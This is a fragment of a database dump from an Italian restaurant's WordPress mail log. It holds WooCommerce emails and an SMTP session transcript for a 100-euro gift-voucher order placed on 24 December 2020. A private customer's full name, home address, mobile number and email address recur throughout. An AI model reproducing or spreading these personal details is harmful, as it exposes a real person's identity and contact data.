offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">You’ve received the following order from Elena Valentini:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=3687&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Order #3687]</a> (24 December 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:c.lorenzetti@inwind.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">c.lorenzetti@inwind.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Elena e Piero</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Tantissimi Auguri di Buone Feste con una piacevole cena per un momemto di relax...</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Total:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Elena Valentini<br>Via Napoli 19<br>47838<br>Riccione<br>RIMINI									<br><a href=\"tel:3382950071\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3382950071</a>													<br>c.lorenzetti@inwind.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulations on the sale.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(37542,3688,'original_headers','Content-Type: text/html\r\nReply-to: Elena Valentini <c.lorenzetti@inwind.it>\r\n'),(37543,3688,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n inherit;\'>Nuova prenotazione cliente</h1>=0A=09=09=09=09=09=09=09=09=09=\r\n=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=\r\n=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Header -->=0A=09=\r\n=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=\r\n=09=09=09<tr>=0A=09=09=09=09=09=09=09=09<td align=3D\"center\" valign=3D\"t=\r\nop\">=0A=09=09=09=09=09=09=09=09=09<!-- Body -->=0A=09=09=09=09=09=09=09=\r\n=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"6=\r\n00\" id=3D\"template_body\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09<td valign=3D\"top\" id=3D\"body_content\" style=\r\n=3D\"background-color: #fdfdfd;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<=\r\n!-- Content -->=0A=09=09=09=09=09=09=09=09=09=09=09=09<table border=3D\"0=\r\n\" cellpadding=3D\"20\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=\r\n=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=\r\n=09<td valign=3D\"top\" style=3D\"padding: 48px 48px 32px;\">=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09=09<div id=3D\"body_content_inner\" style=3D=\r\n\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial=\r\n, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>=0A=\r\n=0A<p style=3D\"margin: 0 0 16px;\">You=E2=80=99ve received the following=\r\n order from Elena Valentini:</p>=0A=0A<h2 style=3D\'color: #557da1; displ=\r\nay: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans=\r\n-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0=\r\n 0 18px; text-align: left;\'>=0A=09<a class=3D\"link\" href=3D\"https://www.=\r\nristorantesolymar.it/wp-admin/post.php?post=3D3687&amp;action=3Dedit\" st=\r\nyle=3D\"font-weight: normal; text-decoration: underline; color: #557da1;\"=\r\n>[Order #3687]</a> (24 December 2020)</h2>=0A=0A<div style=3D\"margin-bot=\r\ntom: 40px;\">=0A=09<table class=3D\"td\" cellspacing=3D\"0\" cellpadding=3D\"6=\r\n\" border=3D\"1\" style=3D\"color: #737373; border: 1px solid #e4e4e4; verti=\r\ncal-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica=\r\n, Roboto, Arial, sans-serif;\">=0A=09=09<thead>=0A=09=09=09<tr>=0A=09=09=\r\n=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"color: #737373; border: 1p=\r\nx solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left=\r\n;\">Product</th>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"co=\r\nlor: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding=\r\n: 12px; text-align: left;\">Quantity</th>=0A=09=09=09=09<th class=3D\"td\"=\r\n scope=3D\"col\" style=3D\"color: #737373; border: 1px solid #e4e4e4; verti=\r\ncal-align: middle; padding: 12px; text-align: left;\">Price</th>=0A=09=09=\r\n=09</tr>=0A=09=09</thead>=0A=09=09<tbody>=0A=09=09=09=09<tr class=3D\"ord=\r\ner_item\">=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px=\r\n solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle;=\r\n font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; wo=\r\nrd-wrap: break-word;\">=0A=09=09Buono Regalo (valore a scelta) (#coupon)<=\r\nul class=3D\"wc-item-meta\" style=3D\"font-size: small; margin: 1em 0 0; pa=\r\ndding: 0; list-style: none;\">=0A<li style=3D\"margin: 0.5em 0 0; padding:=\r\n 0;\">=0A<strong class=3D\"wc-item-meta-label\" style=3D\"float: left; margi=\r\nn-right: .25em; clear: both;\">To:</strong> <p style=3D\"margin: 0;\"><a hr=\r\nef=3D\"mailto:c.lorenzetti@inwind.it\" style=3D\"color: #557da1; font-weigh=\r\nt: normal; text-decoration: underline;\">c.lorenzetti@inwind.it</a></p>=\r\n=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=\r\n=3D\"wc-item-meta-label\" style=3D\"float: left; margin-right: .25em; clear=\r\n: both;\">From:</strong> <p style=3D\"margin: 0;\">Elena e Piero</p>=0A</li=\r\n>=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-=\r\nitem-meta-label\" style=3D\"float: left; margin-right: .25em; clear: both;=\r\n\">Message:</strong> <p style=3D\"margin: 0;\">Tantissimi Auguri di Buone F=\r\neste con una piacevole cena per un momemto di relax...</p>=0A</li>=0A</u=\r\nl>=09=09</td>=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; border:=\r\n 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: mid=\r\ndle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif=\r\n;\">=0A=09=09=091=09=09</td>=0A=09=09<td class=3D\"td\" style=3D\"color: #73=\r\n7373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertic=\r\nal-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Aria=\r\nl, sans-serif;\">=0A=09=09=09<span class=3D\"woocommerce-Price-amount amou=\r\nnt\">100,00<span class=3D\"woocommerce-Price-currencySymbol\">=E2=82=AC</sp=\r\nan></span>=09=09</td>=0A=09</tr>=0A=09=0A=09=09</tbody>=0A=09=09<tfoot>=\r\n=0A=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" sco=\r\npe=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px solid #e4e=\r\n4e4; vertical-align: middle; padding: 12px; text-align: left; border-top=\r\n-width: 4px;\">Subtotal:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=\r\n=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; p=\r\nadding: 12px; text-align: left; border-top-width: 4px;\"><span class=3D\"w=\r\noocommerce-Price-amount amount\">100,00<span class=3D\"woocommerce-Price-c=\r\nurrencySymbol\">=E2=82=AC</span></span></td>=0A=09=09=09=09=09</tr>=0A=09=\r\n=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" sco=\r\npe=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px solid #e4e=\r\n4e4; vertical-align: middle; padding: 12px; text-align: left;\">Payment m=\r\nethod:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #737373=\r\n; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text=\r\n-align: left;\">PayPal</td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=\r\n=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row\" cols=\r\npan=3D\"2\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-a=\r\nlign: middle; padding: 12px; text-align: left;\">Total:</th>=0A=09=09=09=\r\n=09=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4=\r\ne4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span cl=\r\nass=3D\"woocommerce-Price-amount amount\">100,00<span class=3D\"woocommerce=\r\n-Price-currencySymbol\">=E2=82=AC</span></span></td>=0A=09=09=09=09=09</t=\r\nr>=0A=09=09=09=09=09=09=09</tfoot>=0A=09</table>=0A</div>=0A=0A=0A<table=\r\n id=3D\"addresses\" cellspacing=3D\"0\" cellpadding=3D\"0\" border=3D\"0\" style=\r\n=3D\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">=\r\n=0A=09<tr>=0A=09=09<td valign=3D\"top\" width=3D\"50%\" style=3D\"text-align:=\r\n left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-ser=\r\nif; border: 0; padding: 0;\">=0A=09=09=09<h2 style=3D\'color: #557da1; dis=\r\nplay: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sa=\r\nns-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin:=\r\n 0 0 18px; text-align: left;\'>Billing address</h2>=0A=0A=09=09=09<addres=\r\ns class=3D\"address\" style=3D\"padding: 12px; color: #737373; border: 1px=\r\n solid #e4e4e4;\">=0A=09=09=09=09Elena Valentini<br>Via Napoli 19<br>4783=\r\n8<br>Riccione<br>RIMINI=09=09=09=09=09=09=09=09=09<br><a href=3D\"tel:338=\r\n2950071\" style=3D\"color: #557da1; font-weight: normal; text-decoration:=\r\n underline;\">3382950071</a>=09=09=09=09=09=09=09=09=09=09=09=09=09<br>c.=\r\nlorenzetti@inwind.it=09=09=09=09=09=09=09</address>=0A=09=09</td>=0A=09=\r\n=09=09</tr>=0A</table>=0A<p style=3D\"margin: 0 0 16px;\">Congratulations=\r\n on the sale.</p>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09</div>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09</table=\r\n>=0A=09=09=09=09=09=09=09=09=09=09=09=09<!-- End Content -->=0A=09=09=09=\r\n=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=\r\n=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- En=\r\nd Body -->=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=\r\n=0A=09=09=09=09=09=09</table>=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=\r\n=0A=09=09=09=09<tr>=0A=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\"=\r\n>=0A=09=09=09=09=09=09<!-- Footer -->=0A=09=09=09=09=09=09<table border=\r\n=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template=\r\n_footer\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09<td vali=\r\ngn=3D\"top\" style=3D\"padding: 0; border-radius: 6px;\">=0A=09=09=09=09=09=\r\n=09=09=09=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" wid=\r\nth=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09<td colspan=3D\"2\" valign=3D\"middle\" id=3D\"credit\" style=\r\n=3D\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helveti=\r\nca Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-he=\r\night: 150%; text-align: center; padding: 24px 0;\'>=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09=09<p style=3D\"margin: 0 0 16px;\">Sol Y Mar, ristorante a=\r\n Riccione</p>=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=\r\n=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=\r\n=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</=\r\ntable>=0A=09=09=09=09=09=09<!-- End Footer -->=0A=09=09=09=09=09</td>=0A=\r\n=09=09=09=09</tr>=0A=09=09=09</table>=0A=09=09</div>=0A=09</body>=0A</ht=\r\nml>=0A\r\n.\r\n250 OK queued as be1c12e7-667e-4668-9b28-757331252a12\r\n'),(37544,3689,'solution','All good, mail sent.'),(37545,3689,'success','1'),(37546,3689,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37547,3689,'to_header','c.lorenzetti@inwind.it'),(37548,3689,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37549,3689,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37550,3689,'original_to','c.lorenzetti@inwind.it'),(37551,3689,'original_subject','Your Sol Y Mar order has been received!'),(37552,3689,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Thank you for your order</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi Elena,</p>\n<p style=\"margin: 0 0 16px;\">Just to let you know — we\'ve received your order #3687, and it is now being processed:</p>\n\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	[Order #3687] (24 December 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:c.lorenzetti@inwind.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">c.lorenzetti@inwind.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Elena e Piero</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Tantissimi Auguri di Buone Feste con una piacevole cena per un momemto di relax...</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n				<p style=\"margin: 0 0 16px;\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Total:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Elena Valentini<br>Via Napoli 19<br>47838<br>Riccione<br>RIMINI									<br><a href=\"tel:3382950071\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3382950071</a>													<br>c.lorenzetti@inwind.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Thanks for using www.ristorantesolymar.it!</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, 